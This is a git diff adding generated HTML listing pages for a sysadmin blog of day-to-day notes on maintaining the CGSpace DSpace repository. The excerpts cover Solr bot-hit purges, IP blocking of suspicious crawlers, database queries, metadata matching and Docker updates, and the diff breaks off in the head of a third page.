+    <p class="blog-post-meta"><time datetime="2022-07-02T14:07:36+03:00">Sat Jul 02, 2022</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2022-07-02">2022-07-02</h2>
+<ul>
+<li>I learned how to use the Levenshtein functions in PostgreSQL
+<ul>
+<li>The thing is that there is a limit of 255 characters for these functions in PostgreSQL so you need to truncate the strings before comparing</li>
+<li>Also, the trgm functions I&rsquo;ve used before are case insensitive, but Levenshtein is not, so you need to make sure to lower case both strings first</li>
+</ul>
+</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2022-07/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2022-06/">June, 2022</a></h2>
+    <p class="blog-post-meta"><time datetime="2022-06-06T09:01:36+03:00">Mon Jun 06, 2022</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2022-06-06">2022-06-06</h2>
+<ul>
+<li>Look at the Solr statistics on CGSpace
+<ul>
+<li>I see 167,000 hits from a bunch of Microsoft IPs with reverse DNS &ldquo;msnbot-&rdquo; using the Solr query <code>dns:*msnbot* AND dns:*.msn.com</code></li>
+<li>I purged these first so I could see the other &ldquo;real&rdquo; IPs in the Solr facets</li>
+</ul>
+</li>
+<li>I see 47,500 hits from 80.248.237.167 on a data center ISP in Sweden, using a normal user agent</li>
+<li>I see 13,000 hits from 163.237.216.11 on a data center ISP in Australia, using a normal user agent</li>
+<li>I see 7,300 hits from 208.185.238.57 from Britanica, using a normal user agent
+<ul>
+<li>There seem to be many more of these:</li>
+</ul>
+</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2022-06/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2022-05/">May, 2022</a></h2>
+    <p class="blog-post-meta"><time datetime="2022-05-04T09:13:39+03:00">Wed May 04, 2022</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2022-05-04">2022-05-04</h2>
+<ul>
+<li>I found a few more IPs making requests using the shady Chrome 44 user agent in the last few days so I will add them to the block list too:
+<ul>
+<li>18.207.136.176</li>
+<li>185.189.36.248</li>
+<li>50.118.223.78</li>
+<li>52.70.76.123</li>
+<li>3.236.10.11</li>
+</ul>
+</li>
+<li>Looking at the Solr statistics for 2022-04
+<ul>
+<li>52.191.137.59 is Microsoft, but they are using a normal user agent and making tens of thousands of requests</li>
+<li>64.39.98.62 is owned by Qualys, and all their requests are probing for /etc/passwd etc</li>
+<li>185.192.69.15 is in the Netherlands and is using a normal user agent, but making excessive automated HTTP requests to paths forbidden in robots.txt</li>
+<li>157.55.39.159 is owned by Microsoft and identifies as bingbot so I don&rsquo;t know why its requests were logged in Solr</li>
+<li>52.233.67.176 is owned by Microsoft and uses a normal user agent, but making excessive automated HTTP requests</li>
+<li>157.55.39.144 is owned by Microsoft and uses a normal user agent, but making excessive automated HTTP requests</li>
+<li>207.46.13.177 is owned by Microsoft and identifies as bingbot so I don&rsquo;t know why its requests were logged in Solr</li>
+<li>If I query Solr for <code>time:2022-04* AND dns:*msnbot* AND dns:*.msn.com.</code> I see a handful of IPs that made 41,000 requests</li>
+</ul>
+</li>
+<li>I purged 93,974 hits from these IPs using my <code>check-spider-ip-hits.sh</code> script</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2022-05/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2022-04/">April, 2022</a></h2>
+    <p class="blog-post-meta"><time datetime="2022-04-01T10:53:39+03:00">Fri Apr 01, 2022</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  2022-04-01 I did G1GC tests on DSpace Test (linode26) to compliment the CMS tests I did yesterday The Discovery indexing took this long: real 334m33.625s user 227m51.331s sys 3m43.037s 2022-04-04 Start a full harvest on AReS Help Marianne with submit/approve access on a new collection on CGSpace Go back in Gaia&rsquo;s batch reports to find records that she indicated for replacing on CGSpace (ie, those with better new copies, new versions, etc) Looking at the Solr statistics for 2022-03 on CGSpace I see 54.
+  <a href='https://alanorth.github.io/cgspace-notes/2022-04/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2022-03/">March, 2022</a></h2>
+    <p class="blog-post-meta"><time datetime="2022-03-01T16:46:54+03:00">Tue Mar 01, 2022</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2022-03-01">2022-03-01</h2>
+<ul>
+<li>Send Gaia the last batch of potential duplicates for items 701 to 980:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ csvcut -c id,dc.title,dcterms.issued,dcterms.type ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv &gt; /tmp/tac4.csv
+</span></span><span style="display:flex;"><span>$ ./ilri/check-duplicates.py -i /tmp/tac4.csv -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span> -o /tmp/2022-03-01-tac-batch4-701-980.csv
+</span></span><span style="display:flex;"><span>$ csvcut -c id,filename ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv &gt; /tmp/tac4-filenames.csv
+</span></span><span style="display:flex;"><span>$ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv &gt; /tmp/2022-03-01-tac-batch4-701-980-filenames.csv
+</span></span></code></pre></div>
+  <a href='https://alanorth.github.io/cgspace-notes/2022-03/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2022-02/">February, 2022</a></h2>
+    <p class="blog-post-meta"><time datetime="2022-02-01T14:06:54+02:00">Tue Feb 01, 2022</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2022-02-01">2022-02-01</h2>
+<ul>
+<li>Meeting with Peter and Abenet about CGSpace in the One CGIAR
+<ul>
+<li>We agreed to buy $5,000 worth of credits from Atmire for future upgrades</li>
+<li>We agreed to move CRPs and non-CGIAR communities off the home page, as well as some other things for the CGIAR System Organization</li>
+<li>We agreed to make a Discovery facet for CGIAR Action Areas above the existing CGIAR Impact Areas one</li>
+<li>We agreed to try to do more alignment of affiliations/funders with ROR</li>
+</ul>
+</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2022-02/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2022-01/">January, 2022</a></h2>
+    <p class="blog-post-meta"><time datetime="2022-01-01T15:20:54+02:00">Sat Jan 01, 2022</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2022-01-01">2022-01-01</h2>
+<ul>
+<li>Start a full harvest on AReS</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2022-01/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2021-12/">December, 2021</a></h2>
+    <p class="blog-post-meta"><time datetime="2021-12-01T16:07:07+02:00">Wed Dec 01, 2021</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2021-12-01">2021-12-01</h2>
+<ul>
+<li>Atmire merged some changes I had submitted to the COUNTER-Robots project</li>
+<li>I updated our local spider user agents and then re-ran the list with my <code>check-spider-hits.sh</code> script on CGSpace:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./ilri/check-spider-hits.sh -f /tmp/agents -p  
+</span></span><span style="display:flex;"><span>Purging 1989 hits from The Knowledge AI in statistics
+</span></span><span style="display:flex;"><span>Purging 1235 hits from MaCoCu in statistics
+</span></span><span style="display:flex;"><span>Purging 455 hits from WhatsApp in statistics
+</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
+</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>Total number of bot hits purged: 3679
+</span></span></code></pre></div>
+  <a href='https://alanorth.github.io/cgspace-notes/2021-12/'>Read more →</a>
+</article> 
+
+
+
+
+
+<nav class="blog-pagination">
+  
+  <a class="btn btn-outline-primary" href="/cgspace-notes/" rel="prev" role="button">Previous page</a>
+  <a class="btn btn-outline-primary" href="/cgspace-notes/page/3/" rel="next" role="button">Next page</a>
+  
+  
+  
+</nav>
+
+
+
+
+
+        </div> <!-- /.blog-main -->
+
+        <aside class="col-sm-3 ml-auto blog-sidebar">
+  
+
+  
+        <section class="sidebar-module">
+    <h4>Recent Posts</h4>
+    <ol class="list-unstyled">
+
+
+<li><a href="/cgspace-notes/2023-07/">July, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-06/">June, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-05/">May, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-04/">April, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-03/">March, 2023</a></li>
+
+    </ol>
+  </section>
+
+  
+
+  
+  <section class="sidebar-module">
+    <h4>Links</h4>
+    <ol class="list-unstyled">
+      
+      <li><a href="https://cgspace.cgiar.org">CGSpace</a></li>
+      
+      <li><a href="https://dspacetest.cgiar.org">DSpace Test</a></li>
+      
+      <li><a href="https://github.com/ilri/DSpace">CGSpace @ GitHub</a></li>
+      
+    </ol>
+  </section>
+  
+</aside>
+
+
+      </div> <!-- /.row -->
+    </div> <!-- /.container -->
+    
+
+    
+    <footer class="blog-footer">
+      <p dir="auto">
+      
+      Blog template created by <a href="https://twitter.com/mdo">@mdo</a>, ported to Hugo by <a href='https://twitter.com/mralanorth'>@mralanorth</a>.
+      
+      </p>
+      <p>
+      <a href="#">Back to top</a>
+      </p>
+    </footer>
+    
+
+  </body>
+
+</html>
diff --git a/docs/page/3/index.html b/docs/page/3/index.html
new file mode 100644
index 000000000..6a3a18908
--- /dev/null
+++ b/docs/page/3/index.html
@@ -0,0 +1,444 @@
+<!DOCTYPE html>
+<html lang="en" >
+
+  <head>
+    <meta charset="utf-8">
+<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
+
+
+<meta property="og:title" content="CGSpace Notes" />
+<meta property="og:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository." />
+<meta property="og:type" content="website" />
+<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/" />
+<meta property="og:updated_time" content="2023-07-01T17:17:31+03:00" />
+
+
+
+<meta name="twitter:card" content="summary"/>
+<meta name="twitter:title" content="CGSpace Notes"/>
+<meta name="twitter:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."/>
+<meta name="generator" content="Hugo 0.112.3">
+
+
+    
+<script type="application/ld+json">
+{
+  "@context": "http://schema.org",
+  "@type": "Blog",
+  "headline": "CGSpace Notes",
+  "url" : "https://alanorth.github.io/cgspace-notes/",
+  "author": {
+    "@type": "Person",
+    "name": "Alan Orth"
+  },
+  "dateModified": "2023-07-01T17:14:36+03:00",
+  "keywords": "notes, migration, notes",
+  "description":"Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."
+}
+</script>
+
+
+    <link rel="canonical" href="https://alanorth.github.io/cgspace-notes/">
+
+    <title>CGSpace Notes</title>
+
+    
+    <!-- combined, minified CSS -->
+    
+    <link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
+    
+
+    <!-- minified Font Awesome for SVG icons -->
+    
+    <script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
+
+    <!-- RSS 2.0 feed -->
+    <link rel="alternate" type="application/rss+xml" href="https://alanorth.github.io/cgspace-notes/index.xml" title="CGSpace Notes" />
+    
+
+    
+
+  </head>
+
+  <body>
+
+    
+    <div class="blog-masthead">
+      <div class="container">
+        <nav class="nav blog-nav">
+          <a class="nav-link active" href="https://alanorth.github.io/cgspace-notes/">Home</a>
+        </nav>
+      </div>
+    </div>
+    
+
+    
+    
+    <header class="blog-header">
+      <div class="container">
+        <h1 class="blog-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/" rel="home">CGSpace Notes</a></h1>
+        <p class="lead blog-description" dir="auto">Documenting day-to-day work on the <a href="https://cgspace.cgiar.org">CGSpace</a> repository.</p>
+      </div>
+    </header>
+    
+    
+
+    
+    <div class="container">
+      <div class="row">
+        <div class="col-sm-8 blog-main">
+
+          
+
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2021-11/">November, 2021</a></h2>
+    <p class="blog-post-meta"><time datetime="2021-11-02T22:27:07+02:00">Tue Nov 02, 2021</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2021-11-02">2021-11-02</h2>
+<ul>
+<li>I experimented with manually sharding the Solr statistics on DSpace Test</li>
+<li>First I exported all the 2019 stats from CGSpace:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./run.sh -s http://localhost:8081/solr/statistics -f <span style="color:#e6db74">&#39;time:2019-*&#39;</span> -a export -o statistics-2019.json -k uid
+</span></span><span style="display:flex;"><span>$ zstd statistics-2019.json
+</span></span></code></pre></div>
+  <a href='https://alanorth.github.io/cgspace-notes/2021-11/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2021-10/">October, 2021</a></h2>
+    <p class="blog-post-meta"><time datetime="2021-10-01T11:14:07+03:00">Fri Oct 01, 2021</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2021-10-01">2021-10-01</h2>
+<ul>
+<li>Export all affiliations on CGSpace and run them against the latest RoR data dump:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>localhost/dspace63= &gt; \COPY (SELECT DISTINCT text_value as &#34;cg.contributor.affiliation&#34;, count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC) to /tmp/2021-10-01-affiliations.csv WITH CSV HEADER;
+</span></span><span style="display:flex;"><span>$ csvcut -c <span style="color:#ae81ff">1</span> /tmp/2021-10-01-affiliations.csv | sed 1d &gt; /tmp/2021-10-01-affiliations.txt
+</span></span><span style="display:flex;"><span>$ ./ilri/ror-lookup.py -i /tmp/2021-10-01-affiliations.txt -r 2021-09-23-ror-data.json -o /tmp/2021-10-01-affili
+</span></span><span style="display:flex;"><span>ations-matching.csv
+</span></span><span style="display:flex;"><span>$ csvgrep -c matched -m true /tmp/2021-10-01-affiliations-matching.csv | sed 1d | wc -l 
+</span></span><span style="display:flex;"><span>1879
+</span></span><span style="display:flex;"><span>$ wc -l /tmp/2021-10-01-affiliations.txt 
+</span></span><span style="display:flex;"><span>7100 /tmp/2021-10-01-affiliations.txt
+</span></span></code></pre></div><ul>
+<li>So we have 1879/7100 (26.46%) matching already</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2021-10/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2021-09/">September, 2021</a></h2>
+    <p class="blog-post-meta"><time datetime="2021-09-01T09:14:07+03:00">Wed Sep 01, 2021</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2021-09-02">2021-09-02</h2>
+<ul>
+<li>Troubleshooting the missing Altmetric scores on AReS
+<ul>
+<li>Turns out that I didn&rsquo;t actually fix them last month because the check for <code>content.altmetric</code> still exists, and I can&rsquo;t access the DOIs using <code>_h.source.DOI</code> for some reason</li>
+<li>I can access all other kinds of item metadata using the Elasticsearch label, but not DOI!!!</li>
+<li>I will change <code>DOI</code> to <code>tomato</code> in the repository setup and start a re-harvest&hellip; I need to see if this is some kind of reserved word or something&hellip;</li>
+<li>Even as <code>tomato</code> I can&rsquo;t access that field as <code>_h.source.tomato</code> in Angular, but it does work as a filter source&hellip; sigh</li>
+</ul>
+</li>
+<li>I&rsquo;m having problems using the OpenRXV API
+<ul>
+<li>The syntax Moayad showed me last month doesn&rsquo;t seem to honor the search query properly&hellip;</li>
+</ul>
+</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2021-09/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2021-08/">August, 2021</a></h2>
+    <p class="blog-post-meta"><time datetime="2021-08-01T09:01:07+03:00">Sun Aug 01, 2021</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2021-08-01">2021-08-01</h2>
+<ul>
+<li>Update Docker images on AReS server (linode20) and reboot the server:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># docker images | grep -v ^REPO | sed <span style="color:#e6db74">&#39;s/ \+/:/g&#39;</span> | cut -d: -f1,2 | grep -v none | xargs -L1 docker pull
+</span></span></code></pre></div><ul>
+<li>I decided to upgrade linode20 from Ubuntu 18.04 to 20.04</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2021-08/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2021-07/">July, 2021</a></h2>
+    <p class="blog-post-meta"><time datetime="2021-07-01T08:53:07+03:00">Thu Jul 01, 2021</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2021-07-01">2021-07-01</h2>
+<ul>
+<li>Export another list of ALL subjects on CGSpace, including AGROVOC and non-AGROVOC for Enrico:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>localhost/dspace63= &gt; \COPY (SELECT DISTINCT LOWER(text_value) AS subject, count(*) FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata_field_id IN (119, 120, 127, 122, 128, 125, 135, 203, 208, 210, 215, 123, 236, 242, 187) GROUP BY subject ORDER BY count DESC) to /tmp/2021-07-01-all-subjects.csv WITH CSV HEADER;
+</span></span><span style="display:flex;"><span>COPY 20994
+</span></span></code></pre></div>
+  <a href='https://alanorth.github.io/cgspace-notes/2021-07/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2021-06/">June, 2021</a></h2>
+    <p class="blog-post-meta"><time datetime="2021-06-01T10:51:07+03:00">Tue Jun 01, 2021</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2021-06-01">2021-06-01</h2>
+<ul>
+<li>IWMI notified me that AReS was down with an HTTP 502 error
+<ul>
+<li>Looking at UptimeRobot I see it has been down for 33 hours, but I never got a notification</li>
+<li>I don&rsquo;t see anything in the Elasticsearch container logs, or the systemd journal on the host, but I notice that the <code>angular_nginx</code> container isn&rsquo;t running</li>
+<li>I simply started it and AReS was running again:</li>
+</ul>
+</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2021-06/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2021-05/">May, 2021</a></h2>
+    <p class="blog-post-meta"><time datetime="2021-05-02T09:50:54+03:00">Sun May 02, 2021</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2021-05-01">2021-05-01</h2>
+<ul>
+<li>I looked at the top user agents and IPs in the Solr statistics for last month and I see these user agents:
+<ul>
+<li>&ldquo;RI/1.0&rdquo;, 1337</li>
+<li>&ldquo;Microsoft Office Word 2014&rdquo;, 941</li>
+</ul>
+</li>
+<li>I will add the RI/1.0 pattern to our DSpace agents overload and purge them from Solr (we had previously seen this agent with 9,000 hits or so in 2020-09), but I think I will leave the Microsoft Word one&hellip; as that&rsquo;s an actual user&hellip;</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2021-05/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2021-04/">April, 2021</a></h2>
+    <p class="blog-post-meta"><time datetime="2021-04-01T09:50:54+03:00">Thu Apr 01, 2021</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2021-04-01">2021-04-01</h2>
+<ul>
+<li>I wrote a script to query Sherpa&rsquo;s API for our ISSNs: <code>sherpa-issn-lookup.py</code>
+<ul>
+<li>I&rsquo;m curious to see how the results compare with the results from Crossref yesterday</li>
+</ul>
+</li>
+<li>AReS Explorer was down since this morning, I didn&rsquo;t see anything in the systemd journal
+<ul>
+<li>I simply took everything down with docker-compose and then back up, and then it was OK</li>
+<li>Perhaps one of the containers crashed, I should have looked closer but I was in a hurry</li>
+</ul>
+</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2021-04/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2021-03/">March, 2021</a></h2>
+    <p class="blog-post-meta"><time datetime="2021-03-01T10:13:54+02:00">Mon Mar 01, 2021</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2021-03-01">2021-03-01</h2>
+<ul>
+<li>Discuss some OpenRXV issues with Abdullah from CodeObia
+<ul>
+<li>He&rsquo;s trying to work on the DSpace 6+ metadata schema autoimport using the DSpace 6+ REST API</li>
+<li>Also, we found some issues building and running OpenRXV currently due to ecosystem shift in the Node.js dependencies</li>
+</ul>
+</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2021-03/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/cgspace-cgcorev2-migration/">CGSpace CG Core v2 Migration</a></h2>
+    <p class="blog-post-meta"><time datetime="2021-02-21T13:27:35+02:00">Sun Feb 21, 2021</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/tags/migration/" rel="tag">Migration</a>
+
+</p>
+  </header>
+  <p>Changes to CGSpace metadata fields to align more with DC, QDC, and DCTERMS as well as CG Core v2. Implemented on 2021-02-21.</p>
+<p>With reference to <a href="https://agriculturalsemantics.github.io/cg-core/cgcore.html">CG Core v2 draft standard</a> by Marie-Angélique as well as <a href="http://www.dublincore.org/specifications/dublin-core/dcmi-terms/">DCMI DCTERMS</a>.</p>
+  <a href='https://alanorth.github.io/cgspace-notes/cgspace-cgcorev2-migration/'>Read more →</a>
+</article> 
+
+
+
+
+
+<nav class="blog-pagination">
+  
+  <a class="btn btn-outline-primary" href="/cgspace-notes/page/2/" rel="prev" role="button">Previous page</a>
+  <a class="btn btn-outline-primary" href="/cgspace-notes/page/4/" rel="next" role="button">Next page</a>
+  
+  
+  
+</nav>
+
+
+
+
+
+        </div> <!-- /.blog-main -->
+
+        <aside class="col-sm-3 ml-auto blog-sidebar">
+  
+
+  
+        <section class="sidebar-module">
+    <h4>Recent Posts</h4>
+    <ol class="list-unstyled">
+
+
+<li><a href="/cgspace-notes/2023-07/">July, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-06/">June, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-05/">May, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-04/">April, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-03/">March, 2023</a></li>
+
+    </ol>
+  </section>
+
+  
+
+  
+  <section class="sidebar-module">
+    <h4>Links</h4>
+    <ol class="list-unstyled">
+      
+      <li><a href="https://cgspace.cgiar.org">CGSpace</a></li>
+      
+      <li><a href="https://dspacetest.cgiar.org">DSpace Test</a></li>
+      
+      <li><a href="https://github.com/ilri/DSpace">CGSpace @ GitHub</a></li>
+      
+    </ol>
+  </section>
+  
+</aside>
+
+
+      </div> <!-- /.row -->
+    </div> <!-- /.container -->
+    
+
+    
+    <footer class="blog-footer">
+      <p dir="auto">
+      
+      Blog template created by <a href="https://twitter.com/mdo">@mdo</a>, ported to Hugo by <a href='https://twitter.com/mralanorth'>@mralanorth</a>.
+      
+      </p>
+      <p>
+      <a href="#">Back to top</a>
+      </p>
+    </footer>
+    
+
+  </body>
+
+</html>
diff --git a/docs/page/4/index.html b/docs/page/4/index.html
new file mode 100644
index 000000000..de782cd91
--- /dev/null
+++ b/docs/page/4/index.html
@@ -0,0 +1,464 @@
+<!DOCTYPE html>
+<html lang="en" >
+
+  <head>
+    <meta charset="utf-8">
+<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
+
+
+<meta property="og:title" content="CGSpace Notes" />
+<meta property="og:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository." />
+<meta property="og:type" content="website" />
+<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/" />
+<meta property="og:updated_time" content="2023-07-01T17:17:31+03:00" />
+
+
+
+<meta name="twitter:card" content="summary"/>
+<meta name="twitter:title" content="CGSpace Notes"/>
+<meta name="twitter:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."/>
+<meta name="generator" content="Hugo 0.112.3">
+
+
+    
+<script type="application/ld+json">
+{
+  "@context": "http://schema.org",
+  "@type": "Blog",
+  "headline": "CGSpace Notes",
+  "url" : "https://alanorth.github.io/cgspace-notes/",
+  "author": {
+    "@type": "Person",
+    "name": "Alan Orth"
+  },
+  "dateModified": "2023-07-01T17:14:36+03:00",
+  "keywords": "notes, migration, notes",
+  "description":"Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."
+}
+</script>
+
+
+    <link rel="canonical" href="https://alanorth.github.io/cgspace-notes/">
+
+    <title>CGSpace Notes</title>
+
+    
